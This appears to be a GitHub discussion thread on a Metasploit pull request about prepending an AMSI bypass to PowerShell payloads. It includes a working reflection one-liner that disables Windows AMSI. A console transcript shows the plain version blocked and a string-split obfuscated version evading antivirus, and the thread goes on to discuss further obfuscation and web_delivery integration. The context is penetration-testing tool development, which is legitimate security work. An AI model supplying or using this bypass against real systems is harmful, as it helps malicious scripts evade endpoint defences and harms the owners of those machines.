Closed phra closed 5 years ago
@phra I missed this for a bit, but I'd like to test and land this. Can you give specific examples where our current payloads fail, but this succeeds so we can have some testing benchmarks?
@bwatters-r7 just try any powershell payloads on an updated win 10 machine with AMSI.
as reference: https://iwantmore.pizza/posts/amsi.html
Very interesting thanks @phra
I didn't expect the '+'
to work so well:
Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\User>powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\User>
>> $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Stati
c').SetValue($null,$true);
>>
>>
>>
At line:1 char:1
+
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS C:\Users\User> $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');$Ref.GetField('amsiIn'+'itFai
led','NonPublic,Static').SetValue($null,$true);
>>
>>
>>
PS C:\Users\User>
PS C:\Users\User>
Thanks @phra We still need to add this to webdelivery (preferably as an off-by-default option). It would be nice to have the strings obfuscated dynamically, but this will do for now.
I didn't expect the
'+'
to work so well:
It would be nice to have the strings obfuscated dynamically, but this will do for now.
empire includes https://github.com/danielbohannon/Invoke-Obfuscation but depends on PowerShell and that means adding it as optional? dependency or embedding it directly within the project with a ~50mb overhead of stuff.
writing a simpler, similar project in ruby may be an overkill.
any idea?
was prepend_protections_bypass
option defined somewhere?
i don't see the setting available yet with Framework Version: 5.0.19-dev
.
@phra apologies I didn't send a PR with that part, I think I tested with this commit: https://github.com/timwr/metasploit-framework/commit/a0d6bcd3c1a9763a31d64b822f400493bb4042fc
oh ok, i hope it will be merged into master soon! regarding the web delivery, it should be enough to prepend the bypass before the delivery script itself when choosing PowerShell as target.
any update? i still cannot easily add the amsi bypass to powershell payloads.
@timwr any update on this?
@phra did you test the commit I posted above? https://github.com/timwr/metasploit-framework/commit/a0d6bcd3c1a9763a31d64b822f400493bb4042fc maybe you can send a PR to the framework repository that enables it for web_delivery?
maybe you can send a PR to the framework repository that enables it for web_delivery?
@timwr see https://github.com/rapid7/metasploit-framework/pull/12446
Will fix https://github.com/rapid7/metasploit-framework/issues/11283